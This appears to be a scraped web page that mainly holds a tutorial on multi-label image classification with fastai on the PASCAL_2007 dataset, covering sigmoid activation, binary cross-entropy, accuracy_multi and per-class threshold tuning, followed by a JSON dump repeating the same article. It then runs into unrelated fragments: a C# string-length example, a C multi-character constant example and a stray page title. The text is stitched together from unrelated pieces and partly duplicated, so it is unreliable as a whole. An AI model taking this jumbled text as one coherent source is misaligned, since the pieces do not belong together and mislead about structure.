Our splitter is defined above which takes the is_valid column from our dataframe and based on that boolean variable separates train and validation entries The get_x function reads the column fname the filename and appends the base path to the file for loading The get_y function reads the column labels from the dataframe and since our labels are space separated, it splits the labels string by using the space delimiter. item_tfms and batch_tfms: We use the presizing trick from fastai to avoid lossy image cropping (like padded borders etc.) and standard augmentation methods followed by a Normalization using the imagenet_stats as we would be using a pretrained resnet50 for this classification task. Now, if we look at an example of a batch, we can observe the following. Look at how we have multiple labels in images from these examples. Although using the fast.ai API to define the model and loss is pretty straightforward, we should pause for a bit and look at the Loss Function and model, especially the loss function in detail. There are several changes which we are going to do toward the model head. We are not going to use softmax as before but sigmoid activation. What softmax does is it will transform the logits coming from the final classification linear layer to always sum up to 1. What this means for multi-label classification is that we would incur high losses when we encounter examples having multiple labels. Consider the following scenario for example We see that for this hypothetical example, the datapoint actually belongs to class 1 and 4 but the best our softmax can do is push the probability scores of these two classes to 0.5 and that of the remaining two to be 0 but no better than this. This is because probabilities must always sum to 1. Imagine if it were a three class example, then the best softmax could do is push the three probability scores to 0.33 and that of the remaining 1 to 0. Now, let’s look at Sigmoid Activation. Now, we see that the activation function doesn’t care what the other labels are. It is only focussed on the logit for the label in question, unlike softmax. The logits are all decoupled and do not impact amongst themselves as against softmax. This is why in the figure above you can see that the Sigmoid activation probabilities for classes 1 and 3 can climb high to approach 1 and the other two can approach 0 independently. Now, you can appreciate better why we cannot use the softmax activation function but need a separate sigmoid activation function for this problem. Since we have changed the activation function, we ought to reconsider our choice for the loss function. For single label classification, we use the cross entropy loss function defined as follows where ti is the true value and pi is the probability predicted for a label If we continue applying this loss function to our sigmoid activated outputs, we’re in trouble. We will not then be penalizing anything where the ground truth label is 0. For the same example above, if we compute the CE loss we see the picture as follows On the other hand, Binary Cross Entropy is defined as follows where ti is the true value and pi is the probability predicted for a label Now this is really interesting. It makes sure that whatever the label (0/1) some loss will always come to penalize the model for bad predictions. It will never be zero. Where ground truth is 1, the loss will be -log(p) and where it’s 0, the loss would be log(1-p). 
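To make this concrete, here is a small numeric sketch — the four-class logits and targets are made up for illustration — showing that sigmoid plus binary cross-entropy yields a finite, independent loss for every label, including those whose ground truth is 0.

import torch
import torch.nn.functional as F

logits = torch.tensor([[2.0, -1.0, -2.0, 3.0]])   # raw outputs for one datapoint
target = torch.tensor([[1.0,  0.0,  0.0, 1.0]])   # multi-hot ground truth (labels 1 and 4)

print(torch.sigmoid(logits))                      # each label scored independently
print(torch.softmax(logits, dim=1))               # coupled: probabilities must sum to 1

# Per-label binary cross-entropy: -[t*log(p) + (1-t)*log(1-p)]
per_label_loss = F.binary_cross_entropy_with_logits(logits, target, reduction="none")
print(per_label_loss)                             # non-zero everywhere, even where target is 0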
This would be very useful for the model to individually penalize the model via the different neurons in the classifier head for their mispredictions. In the image above, we can see how even when the ground truth label is 0, we are getting finite loss values for those neurons as well as against plain cross-entropy loss employed in single-label classification. For model, we can still continue using our imagenet pretrained backbones and start with transfer learning. Why the same model even if the task is different -Single Label as opposed to Multi label Classification? Although in the end we have to predict multiple labels per output, we still can make use of the same filters which were pretrained to identify humans, animals, objects etc. that were a part of the big imagenet dataset. The pretrained backbone which has intelligently learned these 1000 classes has filters which could detect faces of humans, fur of cats, tails of dogs etc. and similar classes are also present in the PASCAL_2007 dataset. Hence it makes sense to start with this as the anchor point to leverage what we already have! So, we are now in a position to define a fastai learner to do the training. It is as follows: learn = cnn_learner(dls, resnet50, metrics=partial(accuracy_multi, thresh=0.5)) Here we have changed the metrics to use accuracy_multi instead of plain old accuracy. We will discuss this in detail in model evaluation but apart from that we haven’t changed anything from when we were doing Single label classification, or have we? Under the hood, fastai selects BCE loss because we have specified in the dls, our dependent variable is a MultiCategoryBlock. We can explicitly specify it but we need to be aware of it at least. Then the training and lr_find and other things remain the same as shown in the following snip. This is the most important part as this is considerably different for multi-label classification. Firstly, what is accuracy_multi? In case of multi-label classification, our targets are one-hot encoded. Also the outputs that we get are of the same shape as the targets but they're logits. So we apply sigmoid activation on those and get probabilities. In single label classification, we were comparing only one label for a datapoint and if it matches, our result is accurate otherwise it isn’t. However, for multi-label classification, for every datapoint, we predict a vector and the output is also a vector. So we need to compare these vectors instead of a single scalar for every datapoint. Since we have to compare multiple values, and then take an average across these comparisons; hence the name accuracy_multi. The following table will summarize this better. Predictions -> Probabilities to Presence/Absence As we saw in the example above, we assumed predictions as a binary field but the neural network by itself does not give us a discrete value for each class/label. It gives us an array of floats which we need to convert into a probability distribution and subsequently into a discrete value representing the presence/absence of a class/label. First part is simple and we have covered it i.e. going from logits that are output from the neural network to a probability distribution only involves applying a sigmoid activation to the probability values for the respective classes. For the next part i.e. converting probability into a discrete value; we have to do thresholding. What this means is we select a probability value and we use that as a pivot to convert the continuous probabilities into discrete distributions. 
The following example will explain this phenomenon better. As seen in the image, we first take the network outputs and apply sigmoid activation which gives us the probability. Next, we arbitrarily pick 5 thresholds [0.1, 0.3, 0.5, 0.7, 0.9]. Now, what we do is compare these probabilities against the thresholds. When probability > threshold we mark it as True and False otherwise. Then taking an average across the predictions gives us the accuracy for that datapoint. In single label classification, the accuracy for a single datapoint can be either 0 or 1 whereas in multi-label it could be a continuous value between 0 and 1 inclusive of the two. Now, since we’re talking about thresholds it becomes important for us during evaluation to figure out what threshold is the best. Also, currently we’re using the same threshold for all the classes/labels. We can tune the threshold over each class separately to come up with a best score for each class and then use those thresholds to get the multi-accuracy across the entire dataset. Let’s see how to do that. What we did above could be in some sense called Global Thresholding where we used a threshold for all the classes, compared the accuracy for each datapoint, came up with a plot which compares accuracy against the threshold and pick the one which gives the best accuracy. Here’s how we could do it in code This function above gives us the best accuracy point and the threshold at which it occurred which could be simply saved as a artefact with the model and during inference, when we wanna get predictions for individual labels, we can compare their probabilities against this threshold and get the discrete results to denote presence/absence of a class. However, we can do better. In practise, accuracy is not always the best evaluation metric. For eg. in a world where there’s only let’s hypothetically say 1% people who are rich, predicting every person to be poor no matter what will make you 99% accurate, but is that really good? No, right? When you create a classifier where there’s heavy class imbalance, you want your performance to be good across all classes and not just one or two classes which are very highly dominant in your dataset. Accuracy cannot tell us such information. Here, having other metrics like Precision, Recall/TPR, FPR, f1-score etc. become very useful. This post is not meant to deep-dive into these metrics but let's take a cursory glance at them and I will provide good resources at the end to delve deep into each one of those. Precision: This quantity basically tells you of all those examples which are predicted to be of a certain type, how many were actually of that type. If we look at the confusion matrix above, we can define Precision as Recall/TPR: This quantity basically specifies how many examples of a particular category were properly identified by the classifier. It is also called as True Positive Rate or TPR for short. It is given by f1-score: When we're defining a classifier, we want the two to be as high as possible and ideally to be 1 but they're kind of both inversely related to one another. Hence we define a metric which finds the point where they're both best balanced. This is the f1-score which is in principle a harmonic mean between the recall and precision defined as follows FPR: False positive rate is the number of negative examples which are misclassified. It is given by The evaluation of a classifier can be done on several grounds. 
For some accuracy could still be the gold standard of evaluation; for some others, f1-score might be an important figure to ensure the classifier performance across multiple categories. In many cases, the ROC or receiver operating characteristics plot could be used to figure out the classifier performance. We will evaluate our model using all the three techniques to get the best performing model given a specific criterion. A graph of ROC for bus category from the PASCAL_2007 datset on which we trained our model is as follows On the X-axis we have FPR and on the Y-axis we have Recall/TPR. We need to identify the point where the TPR is as high as possible without the FPR increasing. We can figure this out by finding the point which is closest to (0, 1) point i.e. where FPR is 0 and TPR is 1. This is shown in the curve with the red dot. For a perfect classifier, we should have a unit-rectangle kind of a graph but practically the distributions of the two classes are never completely distinguishable in most cases. The complete code to do this will become very large but it is available on GitHub which I have attached in the references section. I will sketch out the pseudo-code for doing this local thresholding and then final aggregation of the predictions. 1. Get the predictions & targets from the fastai learner 2. Separate out the predictions and targets for each and every label. The fastai predictions would be of shape `N_EXAMPLES x N_CLASSES`, so break them into N_CLASSES vectors of length `N_EXAMPLES` each. Similarly do this with the targets. 3. Select a range of thresholds and evaluate the metrics precision, recall, fpr, f1-score for all the examples of each class/label and construct the ROC-AUC Curve. 4. Select the closest point, best accuracy and best f1-score points amongst all those points over which you varied the threshold. Record the threshold for each of those points where you obtain the best of these metrics. 5. Using the recorded thresholds for each class obtained from 4, convert the probability distribution into a discrete one and find the overall accuracy of the multi-label classifier. If we were to make a comparison, individual class/label’s threshold tuning with the bestAccuracy strategy for each class gave us slight jump in accuracy over the global thresholding which also gave us a slight jump as against the default threshold of 0.5 which is commonly used in all classification problems. Multi-label classifier (MLC) can tag a given datapoint with multiple classes/labels.The activation used in MLC is sigmoid not softmax.Loss function used for MLC is BinaryCrossEntropy not CrossEntropy.A good threshold can make a significant difference in getting better/worse accuracy for an MLC.During model evaluation, accuracy may not be the gold standard and metrics such as recall/precision/f1-score will be useful especially when there’s class imbalance when training the model. Multi-label classifier (MLC) can tag a given datapoint with multiple classes/labels. The activation used in MLC is sigmoid not softmax. Loss function used for MLC is BinaryCrossEntropy not CrossEntropy. A good threshold can make a significant difference in getting better/worse accuracy for an MLC. During model evaluation, accuracy may not be the gold standard and metrics such as recall/precision/f1-score will be useful especially when there’s class imbalance when training the model. I hope you enjoyed reading through this blog-post! I would be glad to connect with you on Twitter. 
If you have any comments/suggestions/thoughts, feel free to comment below or reach out to me on Twitter. If you liked what you read, feel free to check out my other posts here.
wandb fastbook sessions link
Github code for the application created in the post
A good explanation of evaluation metrics
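Two short, hedged sketches may help tie the pieces above together. First, a reconstruction of the DataBlock described in The Dataset section: the original code was shared as an embedded gist, so apart from the column names and transforms stated in the text, the exact arguments below (image sizes, crop scale) are illustrative assumptions.

from fastai.vision.all import *
import pandas as pd

path = untar_data(URLs.PASCAL_2007)
df = pd.read_csv(path/"train.csv")

def splitter(df):
    # the is_valid column decides the train/validation split
    train = df.index[~df["is_valid"]].tolist()
    valid = df.index[df["is_valid"]].tolist()
    return train, valid

def get_x(r): return path/"train"/r["fname"]      # path to the image file
def get_y(r): return r["labels"].split(" ")       # space-separated label list

dblock = DataBlock(
    blocks=(ImageBlock, MultiCategoryBlock),      # targets become one-hot vectors
    splitter=splitter,
    get_x=get_x,
    get_y=get_y,
    item_tfms=Resize(460),                        # presizing
    batch_tfms=[*aug_transforms(size=224, min_scale=0.75),
                Normalize.from_stats(*imagenet_stats)],
)
dls = dblock.dataloaders(df)
learn = cnn_learner(dls, resnet50, metrics=partial(accuracy_multi, thresh=0.5))

Second, a sketch of the per-class ("local") threshold tuning pseudo-code from the Model Evaluation section, using the bestAccuracy strategy; the f1-score and closest-to-(0, 1) strategies follow the same pattern with a different scoring function, and the full implementation is in the GitHub repository linked above.

import torch

# 1. sigmoid probabilities and multi-hot targets from the learner (after training)
preds, targs = learn.get_preds()                  # shapes: (N_EXAMPLES, N_CLASSES)
targs = targs.float()

thresholds = torch.linspace(0.05, 0.95, 19)
best_thresh = torch.zeros(preds.shape[1])

# 2-4. sweep thresholds for each class and record the best-accuracy threshold
for c in range(preds.shape[1]):
    p, t = preds[:, c], targs[:, c]
    accs = torch.stack([((p > th).float() == t).float().mean() for th in thresholds])
    best_thresh[c] = thresholds[accs.argmax()]

# 5. binarize each class with its own threshold and compute the overall accuracy
binarized = (preds > best_thresh).float()         # per-column thresholds broadcast
overall_acc = (binarized == targs).float().mean()
print(best_thresh)
print(f"overall multi-label accuracy: {overall_acc.item():.4f}")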
[ { "code": null, "e": 267, "s": 172, "text": "IntroductionThe DatasetModel, Activation Function and LossModel EvaluationConclusionReferences" }, { "code": null, "e": 280, "s": 267, "text": "Introduction" }, { "code": null, "e": 292, "s": 280, "text": "The Dataset" }, { "code": null, "e": 328, "s": 292, "text": "Model, Activation Function and Loss" }, { "code": null, "e": 345, "s": 328, "text": "Model Evaluation" }, { "code": null, "e": 356, "s": 345, "text": "Conclusion" }, { "code": null, "e": 367, "s": 356, "text": "References" }, { "code": null, "e": 568, "s": 367, "text": "Many a time we come across images which have multiple objects of interest in them which we wish to identify. For instance, in the following image we can see that we have both a chair and a tv monitor." }, { "code": null, "e": 782, "s": 568, "text": "To solve the above problem, we need to be able to detect multiple classes/labels in a given image. This is what multi-label classification is. Given an image, categorize it into more than one class/label/category." }, { "code": null, "e": 1274, "s": 782, "text": "Since fastai is a very convenient wrapper around Pytorch, there's very little that we will have to change from the perspective of code but the logic behind solving this problem will be somewhat different. We cannot just use our regular softmax activation with cross-entropy loss function; also the evaluation bit here is much more involved than that of a single-label classification problem. We shall discuss every bit in detail in the following sections. Let's first begin with the dataset." }, { "code": null, "e": 1439, "s": 1274, "text": "We will be using the PASCAL_2007 dataset for this task. This is a dataset which contains 20 labels in all and mind the fact that one image can have multiple labels!" }, { "code": null, "e": 1591, "s": 1439, "text": "Simply use fastai’s untar_data to download the dataset to your disk. It will be stored in a special directory called .fastai at your home/root location" }, { "code": null, "e": 1658, "s": 1591, "text": "from fastai.vision.all import *path = untar_data(URLs.PASCAL_2007)" }, { "code": null, "e": 1747, "s": 1658, "text": "If we look at the stats from a label POV for our train dataset, we obtain the following." }, { "code": null, "e": 1946, "s": 1747, "text": "From the above figure we can see that “person” is a highly recurring category in the train dataset and other categories are more or less equally represented. So, we have an imbalance in our dataset." }, { "code": null, "e": 2416, "s": 1946, "text": "Another interesting thing to note is that the sum of label counts is not the same as number of data points. In single label this used to be true because every image had one and only one label but in case of a multi-label classifier, since each datapoint is not bound to have only one object, it is worth noting that there can be more labels than number of images. This will lead us to change our strategy for building classifiers as against single-label classification." }, { "code": null, "e": 2883, "s": 2416, "text": "In this dataset, we’re given the labels in the form of a dataframe and not in a folder structure, same as in Imagenet. So we’ll have to read each entry from the dataframe and define getter methods to retrieve the values of input and output. Also, the split is defined using a column in the dataframe called is_valid. We shall define a custom function that provides the splits i.e. 
indices of the train and validation set separately for all the points in our dataset." }, { "code": null, "e": 2914, "s": 2883, "text": "In code, this looks as follows" }, { "code": null, "e": 3347, "s": 2914, "text": "Now, we can define a dataloader once we have the proper getters for the three main tasks i.e. getting dependent & independent variable and how to split them into train and validation files. Unlike single label classification tasks, for this task, we will have to use the MultiCategoryBlock in order to read our dependent variables as one-hot encoded vectors. The rest of the loading remains the same. We can load the data as follows" }, { "code": null, "e": 3500, "s": 3347, "text": "Our independent variable is an Image hence ImageBlock as input followed by a MultiCategoryBlock for one-hot encoding and loading the dependent variable." }, { "code": null, "e": 3655, "s": 3500, "text": "Our splitter is defined above which takes the is_valid column from our dataframe and based on that boolean variable separates train and validation entries" }, { "code": null, "e": 3760, "s": 3655, "text": "The get_x function reads the column fname the filename and appends the base path to the file for loading" }, { "code": null, "e": 3922, "s": 3760, "text": "The get_y function reads the column labels from the dataframe and since our labels are space separated, it splits the labels string by using the space delimiter." }, { "code": null, "e": 4204, "s": 3922, "text": "item_tfms and batch_tfms: We use the presizing trick from fastai to avoid lossy image cropping (like padded borders etc.) and standard augmentation methods followed by a Normalization using the imagenet_stats as we would be using a pretrained resnet50 for this classification task." }, { "code": null, "e": 4343, "s": 4204, "text": "Now, if we look at an example of a batch, we can observe the following. Look at how we have multiple labels in images from these examples." }, { "code": null, "e": 4537, "s": 4343, "text": "Although using the fast.ai API to define the model and loss is pretty straightforward, we should pause for a bit and look at the Loss Function and model, especially the loss function in detail." }, { "code": null, "e": 4677, "s": 4537, "text": "There are several changes which we are going to do toward the model head. We are not going to use softmax as before but sigmoid activation." }, { "code": null, "e": 4977, "s": 4677, "text": "What softmax does is it will transform the logits coming from the final classification linear layer to always sum up to 1. What this means for multi-label classification is that we would incur high losses when we encounter examples having multiple labels. Consider the following scenario for example" }, { "code": null, "e": 5426, "s": 4977, "text": "We see that for this hypothetical example, the datapoint actually belongs to class 1 and 4 but the best our softmax can do is push the probability scores of these two classes to 0.5 and that of the remaining two to be 0 but no better than this. This is because probabilities must always sum to 1. Imagine if it were a three class example, then the best softmax could do is push the three probability scores to 0.33 and that of the remaining 1 to 0." }, { "code": null, "e": 5465, "s": 5426, "text": "Now, let’s look at Sigmoid Activation." }, { "code": null, "e": 5622, "s": 5465, "text": "Now, we see that the activation function doesn’t care what the other labels are. It is only focussed on the logit for the label in question, unlike softmax." 
}, { "code": null, "e": 5708, "s": 5622, "text": "The logits are all decoupled and do not impact amongst themselves as against softmax." }, { "code": null, "e": 5891, "s": 5708, "text": "This is why in the figure above you can see that the Sigmoid activation probabilities for classes 1 and 3 can climb high to approach 1 and the other two can approach 0 independently." }, { "code": null, "e": 6038, "s": 5891, "text": "Now, you can appreciate better why we cannot use the softmax activation function but need a separate sigmoid activation function for this problem." }, { "code": null, "e": 6142, "s": 6038, "text": "Since we have changed the activation function, we ought to reconsider our choice for the loss function." }, { "code": null, "e": 6233, "s": 6142, "text": "For single label classification, we use the cross entropy loss function defined as follows" }, { "code": null, "e": 6308, "s": 6233, "text": "where ti is the true value and pi is the probability predicted for a label" }, { "code": null, "e": 6562, "s": 6308, "text": "If we continue applying this loss function to our sigmoid activated outputs, we’re in trouble. We will not then be penalizing anything where the ground truth label is 0. For the same example above, if we compute the CE loss we see the picture as follows" }, { "code": null, "e": 6624, "s": 6562, "text": "On the other hand, Binary Cross Entropy is defined as follows" }, { "code": null, "e": 6699, "s": 6624, "text": "where ti is the true value and pi is the probability predicted for a label" }, { "code": null, "e": 7114, "s": 6699, "text": "Now this is really interesting. It makes sure that whatever the label (0/1) some loss will always come to penalize the model for bad predictions. It will never be zero. Where ground truth is 1, the loss will be -log(p) and where it’s 0, the loss would be log(1-p). This would be very useful for the model to individually penalize the model via the different neurons in the classifier head for their mispredictions." }, { "code": null, "e": 7325, "s": 7114, "text": "In the image above, we can see how even when the ground truth label is 0, we are getting finite loss values for those neurons as well as against plain cross-entropy loss employed in single-label classification." }, { "code": null, "e": 7432, "s": 7325, "text": "For model, we can still continue using our imagenet pretrained backbones and start with transfer learning." }, { "code": null, "e": 7537, "s": 7432, "text": "Why the same model even if the task is different -Single Label as opposed to Multi label Classification?" }, { "code": null, "e": 8070, "s": 7537, "text": "Although in the end we have to predict multiple labels per output, we still can make use of the same filters which were pretrained to identify humans, animals, objects etc. that were a part of the big imagenet dataset. The pretrained backbone which has intelligently learned these 1000 classes has filters which could detect faces of humans, fur of cats, tails of dogs etc. and similar classes are also present in the PASCAL_2007 dataset. Hence it makes sense to start with this as the anchor point to leverage what we already have!" }, { "code": null, "e": 8164, "s": 8070, "text": "So, we are now in a position to define a fastai learner to do the training. 
It is as follows:" }, { "code": null, "e": 8244, "s": 8164, "text": "learn = cnn_learner(dls, resnet50, metrics=partial(accuracy_multi, thresh=0.5))" }, { "code": null, "e": 8494, "s": 8244, "text": "Here we have changed the metrics to use accuracy_multi instead of plain old accuracy. We will discuss this in detail in model evaluation but apart from that we haven’t changed anything from when we were doing Single label classification, or have we?" }, { "code": null, "e": 8689, "s": 8494, "text": "Under the hood, fastai selects BCE loss because we have specified in the dls, our dependent variable is a MultiCategoryBlock. We can explicitly specify it but we need to be aware of it at least." }, { "code": null, "e": 8784, "s": 8689, "text": "Then the training and lr_find and other things remain the same as shown in the following snip." }, { "code": null, "e": 8882, "s": 8784, "text": "This is the most important part as this is considerably different for multi-label classification." }, { "code": null, "e": 8915, "s": 8882, "text": "Firstly, what is accuracy_multi?" }, { "code": null, "e": 9136, "s": 8915, "text": "In case of multi-label classification, our targets are one-hot encoded. Also the outputs that we get are of the same shape as the targets but they're logits. So we apply sigmoid activation on those and get probabilities." }, { "code": null, "e": 9650, "s": 9136, "text": "In single label classification, we were comparing only one label for a datapoint and if it matches, our result is accurate otherwise it isn’t. However, for multi-label classification, for every datapoint, we predict a vector and the output is also a vector. So we need to compare these vectors instead of a single scalar for every datapoint. Since we have to compare multiple values, and then take an average across these comparisons; hence the name accuracy_multi. The following table will summarize this better." }, { "code": null, "e": 9699, "s": 9650, "text": "Predictions -> Probabilities to Presence/Absence" }, { "code": null, "e": 10040, "s": 9699, "text": "As we saw in the example above, we assumed predictions as a binary field but the neural network by itself does not give us a discrete value for each class/label. It gives us an array of floats which we need to convert into a probability distribution and subsequently into a discrete value representing the presence/absence of a class/label." }, { "code": null, "e": 10275, "s": 10040, "text": "First part is simple and we have covered it i.e. going from logits that are output from the neural network to a probability distribution only involves applying a sigmoid activation to the probability values for the respective classes." }, { "code": null, "e": 10576, "s": 10275, "text": "For the next part i.e. converting probability into a discrete value; we have to do thresholding. What this means is we select a probability value and we use that as a pivot to convert the continuous probabilities into discrete distributions. The following example will explain this phenomenon better." }, { "code": null, "e": 10987, "s": 10576, "text": "As seen in the image, we first take the network outputs and apply sigmoid activation which gives us the probability. Next, we arbitrarily pick 5 thresholds [0.1, 0.3, 0.5, 0.7, 0.9]. Now, what we do is compare these probabilities against the thresholds. When probability > threshold we mark it as True and False otherwise. Then taking an average across the predictions gives us the accuracy for that datapoint." 
}, { "code": null, "e": 11168, "s": 10987, "text": "In single label classification, the accuracy for a single datapoint can be either 0 or 1 whereas in multi-label it could be a continuous value between 0 and 1 inclusive of the two." }, { "code": null, "e": 11579, "s": 11168, "text": "Now, since we’re talking about thresholds it becomes important for us during evaluation to figure out what threshold is the best. Also, currently we’re using the same threshold for all the classes/labels. We can tune the threshold over each class separately to come up with a best score for each class and then use those thresholds to get the multi-accuracy across the entire dataset. Let’s see how to do that." }, { "code": null, "e": 11850, "s": 11579, "text": "What we did above could be in some sense called Global Thresholding where we used a threshold for all the classes, compared the accuracy for each datapoint, came up with a plot which compares accuracy against the threshold and pick the one which gives the best accuracy." }, { "code": null, "e": 11884, "s": 11850, "text": "Here’s how we could do it in code" }, { "code": null, "e": 12234, "s": 11884, "text": "This function above gives us the best accuracy point and the threshold at which it occurred which could be simply saved as a artefact with the model and during inference, when we wanna get predictions for individual labels, we can compare their probabilities against this threshold and get the discrete results to denote presence/absence of a class." }, { "code": null, "e": 12261, "s": 12234, "text": "However, we can do better." }, { "code": null, "e": 12515, "s": 12261, "text": "In practise, accuracy is not always the best evaluation metric. For eg. in a world where there’s only let’s hypothetically say 1% people who are rich, predicting every person to be poor no matter what will make you 99% accurate, but is that really good?" }, { "code": null, "e": 13042, "s": 12515, "text": "No, right? When you create a classifier where there’s heavy class imbalance, you want your performance to be good across all classes and not just one or two classes which are very highly dominant in your dataset. Accuracy cannot tell us such information. Here, having other metrics like Precision, Recall/TPR, FPR, f1-score etc. become very useful. This post is not meant to deep-dive into these metrics but let's take a cursory glance at them and I will provide good resources at the end to delve deep into each one of those." }, { "code": null, "e": 13260, "s": 13042, "text": "Precision: This quantity basically tells you of all those examples which are predicted to be of a certain type, how many were actually of that type. If we look at the confusion matrix above, we can define Precision as" }, { "code": null, "e": 13466, "s": 13260, "text": "Recall/TPR: This quantity basically specifies how many examples of a particular category were properly identified by the classifier. It is also called as True Positive Rate or TPR for short. It is given by" }, { "code": null, "e": 13823, "s": 13466, "text": "f1-score: When we're defining a classifier, we want the two to be as high as possible and ideally to be 1 but they're kind of both inversely related to one another. Hence we define a metric which finds the point where they're both best balanced. 
This is the f1-score which is in principle a harmonic mean between the recall and precision defined as follows" }, { "code": null, "e": 13923, "s": 13823, "text": "FPR: False positive rate is the number of negative examples which are misclassified. It is given by" }, { "code": null, "e": 14413, "s": 13923, "text": "The evaluation of a classifier can be done on several grounds. For some accuracy could still be the gold standard of evaluation; for some others, f1-score might be an important figure to ensure the classifier performance across multiple categories. In many cases, the ROC or receiver operating characteristics plot could be used to figure out the classifier performance. We will evaluate our model using all the three techniques to get the best performing model given a specific criterion." }, { "code": null, "e": 14517, "s": 14413, "text": "A graph of ROC for bus category from the PASCAL_2007 datset on which we trained our model is as follows" }, { "code": null, "e": 15011, "s": 14517, "text": "On the X-axis we have FPR and on the Y-axis we have Recall/TPR. We need to identify the point where the TPR is as high as possible without the FPR increasing. We can figure this out by finding the point which is closest to (0, 1) point i.e. where FPR is 0 and TPR is 1. This is shown in the curve with the red dot. For a perfect classifier, we should have a unit-rectangle kind of a graph but practically the distributions of the two classes are never completely distinguishable in most cases." }, { "code": null, "e": 15257, "s": 15011, "text": "The complete code to do this will become very large but it is available on GitHub which I have attached in the references section. I will sketch out the pseudo-code for doing this local thresholding and then final aggregation of the predictions." }, { "code": null, "e": 15314, "s": 15257, "text": "1. Get the predictions & targets from the fastai learner" }, { "code": null, "e": 15553, "s": 15314, "text": "2. Separate out the predictions and targets for each and every label. The fastai predictions would be of shape `N_EXAMPLES x N_CLASSES`, so break them into N_CLASSES vectors of length `N_EXAMPLES` each. Similarly do this with the targets." }, { "code": null, "e": 15717, "s": 15553, "text": "3. Select a range of thresholds and evaluate the metrics precision, recall, fpr, f1-score for all the examples of each class/label and construct the ROC-AUC Curve." }, { "code": null, "e": 15937, "s": 15717, "text": "4. Select the closest point, best accuracy and best f1-score points amongst all those points over which you varied the threshold. Record the threshold for each of those points where you obtain the best of these metrics." }, { "code": null, "e": 16120, "s": 15937, "text": "5. Using the recorded thresholds for each class obtained from 4, convert the probability distribution into a discrete one and find the overall accuracy of the multi-label classifier." }, { "code": null, "e": 16430, "s": 16120, "text": "If we were to make a comparison, individual class/label’s threshold tuning with the bestAccuracy strategy for each class gave us slight jump in accuracy over the global thresholding which also gave us a slight jump as against the default threshold of 0.5 which is commonly used in all classification problems." 
}, { "code": null, "e": 16914, "s": 16430, "text": "Multi-label classifier (MLC) can tag a given datapoint with multiple classes/labels.The activation used in MLC is sigmoid not softmax.Loss function used for MLC is BinaryCrossEntropy not CrossEntropy.A good threshold can make a significant difference in getting better/worse accuracy for an MLC.During model evaluation, accuracy may not be the gold standard and metrics such as recall/precision/f1-score will be useful especially when there’s class imbalance when training the model." }, { "code": null, "e": 16999, "s": 16914, "text": "Multi-label classifier (MLC) can tag a given datapoint with multiple classes/labels." }, { "code": null, "e": 17050, "s": 16999, "text": "The activation used in MLC is sigmoid not softmax." }, { "code": null, "e": 17117, "s": 17050, "text": "Loss function used for MLC is BinaryCrossEntropy not CrossEntropy." }, { "code": null, "e": 17213, "s": 17117, "text": "A good threshold can make a significant difference in getting better/worse accuracy for an MLC." }, { "code": null, "e": 17402, "s": 17213, "text": "During model evaluation, accuracy may not be the gold standard and metrics such as recall/precision/f1-score will be useful especially when there’s class imbalance when training the model." }, { "code": null, "e": 17606, "s": 17402, "text": "I hope you enjoyed reading through this blog-post! I would be glad to connect with you on Twitter. If you have any comments/suggestions/thoughts, feel free to comment below or reach out to me on Twitter." }, { "code": null, "e": 17678, "s": 17606, "text": "If you liked what you read, feel free to check out my other posts here." }, { "code": null, "e": 17798, "s": 17678, "text": "wandb fastbook sessions linkGithub code for the application created in the postA good explanation of evaluation metrics" }, { "code": null, "e": 17827, "s": 17798, "text": "wandb fastbook sessions link" }, { "code": null, "e": 17879, "s": 17827, "text": "Github code for the application created in the post" } ]
How to calculate the length of the string using C#?
Use the String.Length property in C# to get the length of a string. str.Length The property returns the number of characters in the specified string; for example, the string Amit has 4 characters − string str = "Amit"; The following is the C# program to calculate the string length − using System; using System.Collections; namespace Demo { class Program { static void Main(string[] args) { string str = "Amit"; Console.WriteLine("String: "+str); Console.WriteLine("String Length: "+str.Length); Console.ReadKey(); } } } String: Amit String Length: 4
[ { "code": null, "e": 1132, "s": 1062, "text": "Use the String.Length property in C# to get the length of the string." }, { "code": null, "e": 1143, "s": 1132, "text": "str.Length" }, { "code": null, "e": 1288, "s": 1143, "text": "The property calculates the words in the string and displays the length of the specified string, for example, the string Amit has 4 characters −" }, { "code": null, "e": 1309, "s": 1288, "text": "string str = \"Amit\";" }, { "code": null, "e": 1374, "s": 1309, "text": "The following is the C# program to calculate the string length −" }, { "code": null, "e": 1385, "s": 1374, "text": " Live Demo" }, { "code": null, "e": 1681, "s": 1385, "text": "using System;\nusing System.Collections;\n\nnamespace Demo {\n\n class Program {\n\n static void Main(string[] args) {\n\n string str = \"Amit\";\n\n Console.WriteLine(\"String: \"+str);\n Console.WriteLine(\"String Length: \"+str.Length);\n Console.ReadKey();\n }\n }\n}" }, { "code": null, "e": 1711, "s": 1681, "text": "String: Amit\nString Length: 4" } ]
Assigning multiple characters in an int in C language
Character data is stored internally by its ASCII value in C and C++. If we print a single character as an integer, we get its ASCII value. But when we put more than one character inside single quotes (a multi-character constant), the program prints an unexpected number. Check the following program to get the idea. #include <stdio.h> int main() { printf("%d\n", 'A'); printf("%d\n", 'AA'); printf("%d\n", 'ABC'); } 65 16705 4276803 The ASCII value of A is 65, so 'A' prints 65 (01000001). For 'AA', the two bytes 65 and 65 are packed into a single int (01000001 01000001), which is 16705. For 'ABC', the three bytes 65, 66 and 67 are packed together (01000001 01000010 01000011), which is 4276803.
[ { "code": null, "e": 1337, "s": 1062, "text": "The character type data is stored by its ASCII value internally in C or C++. If we want to print a single character as integer, we will get the ASCII value. But when we are trying to print more than one character using a single quote, then it will print some strange output." }, { "code": null, "e": 1389, "s": 1337, "text": "Please check the following program to get the idea." }, { "code": null, "e": 1498, "s": 1389, "text": "#include <stdio.h>\nint main() {\n printf(\"%d\\n\", 'A');\n printf(\"%d\\n\", 'AA');\n printf(\"%d\\n\", 'ABC');\n}" }, { "code": null, "e": 1515, "s": 1498, "text": "65\n16705\n4276803" }, { "code": null, "e": 1729, "s": 1515, "text": "The ASCII of A is 65. So at first it is showing 65 (01000001). Now for AA, it is showing 16705. This is ASCII of 6565 (01000001 01000001) = 16705. For third the value is ABC (01000001 01000010 01000011) = 4276803." } ]
How to Get First or Last Entry from Java LinkedHashMap? - GeeksforGeeks
